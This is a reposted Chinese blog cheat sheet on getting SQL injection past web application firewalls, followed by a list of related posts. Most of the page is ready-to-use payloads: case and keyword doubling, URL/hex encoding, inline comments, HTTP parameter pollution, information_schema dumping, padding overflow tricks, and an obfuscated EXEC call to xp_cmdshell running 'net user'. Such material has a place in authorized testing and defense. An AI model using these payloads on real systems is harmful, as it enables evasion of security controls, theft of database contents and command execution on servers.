2. 程式人生 > 資料庫 >SQL注入過WAF思路

SQL注入過WAF思路

阿新 發佈:2020-12-15

基礎

大小寫
id=-1 uNIoN sELecT 1,2,3
雙寫
id=-1 UNIunionON SELselectECT 1,2,3
編碼
id=1%252f%252a*/UNION%252f%252a /SELECT
id=1%D6‘%20AND%201=2%23 SELECT 'Ä'='A'; #1
十六進位制
id=-1 /*!u%6eion*/ /*!se%6cect*/ 1,2,3 SELECT(extractvalue(0x3C613E61646D696E3C2F613E,0x2f61))
註釋&內聯註釋
id=-1 %55nION/**/%53ElecT 1,2,3
id=-1'union%a0select pass from users#
id=-1 /*!UNION*/ /*!SELECT*/ 1,2,3
id=-1 %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3

特殊符號

+ ` symbol: select `version()`;
+ +- :select+id-1+1.from users;
+ @:select@^1.from users;
+Mysql function() as xxx
+`、~、!、@、%、()、[]、.、-、+ 、|、%00
'se’+’lec’+’t’
%S%E%L%E%C%T 1
1.aspx?id=1;EXEC(‘ma’+'ster..x’+'p_cm’+'dsh’+'ell ”net user”’)
' or --+2=- -!!!'2
id=1+(UnI)(oN)+(SeL)(EcT)

函式替換

hex()、bin() ==> ascii()
sleep() ==>benchmark()
concat_ws()==>group_concat()
substr((select 'password'),1,1) = 0x70
strcmp(left('password',1), 0x69) = 
strcmp(left('password',1), 0x70) = 0
strcmp(left('password',1), 0x71) = -1
mid()、substr() ==> substring()
@@user ==> user()
@@datadir ==> datadir()

http相關

http引數解析
/?id=1;select+1,2,3+from+users+where+id=1—
/?id=1;select+1&id=2,3+from+users+where+id=1—
/?id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users

http引數分段
/?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--
select * from table where a=1 union/* and b=*/select 1,pass/* limit */from users--

IntegrationIntegration

id=-1+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4…
id=1/*!UnIoN*/+SeLeCT+1,2,concat(/*!table_name*/)+FrOM /*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/+like+database()– -
?id=-1+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(COLUMN_NAME),3,4,5+FROM+/*!INFORMATION_SCHEM*/.COLUMNS+WHERE+TABLE_NAME=0x41646d696e--

快取區溢位

?id=1 and (select 1)=(Select 0xA*1000)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
參考
https://vulnerablelife.wordpress.com/2014/12/18/web-application-firewall-bypass-techniques/

相關推薦

SQL注入WAF思路

基礎 大小寫 id=-1 uNIoN sELecT 1,2,3 雙寫 id=-1 UNIunionON SELselectECT 1,2,3 編碼 id=1%252f%252a*/UNION%252f%252a /SELECT

SQL注入WAF指令碼繞過

前言 在攻防實戰中,往往需要掌握一些特性,比如伺服器、資料庫、應用層、WAF層等,以便我們更靈活地去構造Payload,從而可以和各種WAF進行對抗,甚至繞過安全防禦措施進行漏洞利用。

SQL注入WAF

如果有原始碼白盒針對性的繞waf,如果沒有,進行以下黑盒繞過嘗試。 架構層繞WAF

SQL注入手法和思路(一)

MYSQL聯合查詢注入 MYSQL資料庫知識 在MYSQL5.0以上版本中,MYSQL存在一個自帶資料庫名為information_schema,它是一個儲存記錄有所有資料庫名,表名,列名的資料庫,也相當於可以通過查詢它獲取指定資料庫下面的

waf攻防之sql注入

0x00 前言 隨著國家安全法的出臺,網路安全迎來發展的新時期,越來越多企業或政府單位開始重視網路安全。很多網站陸陸續續告別裸奔時代,開始部署web應用防火牆(WAF)以應對網路攻擊。由此,相關網站的安全性很大程

一專屬SRC - Sql注入 - Bypass 長亭Waf

Bypass手法就是不發, 要是很熟的鐵子 想要報告可以找我 我發你。不認識的鐵子 咱也可以認識哈哈

WAF Bypass SQL注入

0x00 WAF 概述 什麼是 WAF 全稱 Web Application Firewall(WEB 應用防護系統),與傳統的 Firewall(防火牆)不同,WAF 針對的是應用層

從ctfshow web2 題目梳理sql注入基本思路

題目是 “最簡單的SQL注入” ,此題是最基礎的SQL注入題目,後端針對前端傳入引數不做任何過濾

excel匯出因SQL耗時長導致介面超時解決思路

思路:1. 檢視檔案是否生成,生成直接返回。2、沒有生成,加鎖進行非同步耗時操作生成。

sql注入原理及防範

前言         sql注入是一種危險係數較高的攻擊方式,現在由於我們持久層框架越來越多,大部分框架會處理這個問題,因此導致我們對它的關注度越來越少了。最近部門在整理安全漏洞時,提到了一些關於sql注入的修改

詳解SQL注入--安全(二)

如果此文章有什麼錯誤,或者您有什麼建議,歡迎隨時聯絡我,謝謝! 寫在前面:在前兩天初學SQL注入的基礎上,繼續在Metasploitable-Linux環境下進行練習。

關於sql注入的簡要演示(入坑拋磚)

首先可能大家都會問什麼是sql? Sql是資料庫的一種型別,是用來儲存網站資料的。

淺談一次與sql注入 & webshell 的美麗“邂逅”

引言 一波未平,一波又起。金融公司的業務實在是太引人耳目,何況我們公司的業處正處於風口之上(區塊鏈金融),並且每天有大量現金交易,所以不知道有多少躲在暗處一直在盯著你的系統,讓你防不勝防,並且想方設法的

pymysql如何解決sql注入問題深入講解

1. SQL 注入 SQL 注入是非常常見的一種網路攻擊方式,主要是通過引數來讓 mysql 執行 sql 語句時進行預期之外的操作。

使用PDO防sql注入的原理分析

前言 本文使用pdo的預處理方式可以避免sql注入。下面話不多說了,來一起看看詳細的介紹吧

SQL注入的2個小Trick及示例總結

前言 最近發現了兩個關於sql注入的小trick,分享一下.下面話不多說了,來一起看看詳細的介紹吧

SQL注入技巧之顯注與盲注中過濾逗號繞過詳析

前言 sql注入在很早很早以前是很常見的一個漏洞。後來隨著安全水平的提高,sql注入已經很少能夠看到了。但是就在今天,還有很多網站帶著sql注入漏洞在執行。下面這篇文章主要介紹了關於SQL注入逗號繞過的相關內容,分

深入瞭解SQL注入

1 .什麼是sql注入Sql injection)? Sql注入是一種將sql程式碼新增到輸入引數中,傳遞到Sql伺服器解析並執行的一種攻擊手法

使用keras做SQL注入攻擊的判斷(例項講解)

本文是通過深度學習框架keras來做SQL注入特徵識別, 不過雖然用了keras,但是大部分還是普通的神經網路,只是外加了一些規則化、dropout層(隨著深度學習出現的層)。

SQL注入原理與解決方法程式碼示例

一、什麼是sql注入? 1、什麼是sql注入呢? 所謂SQL注入,就是通過把SQL命令插入到Web表單遞交或輸入域名或頁面請求的查詢字串,最終達到欺騙伺服器執行惡意的SQL命令,比如先前的很多影視網站洩露VIP會員密碼大多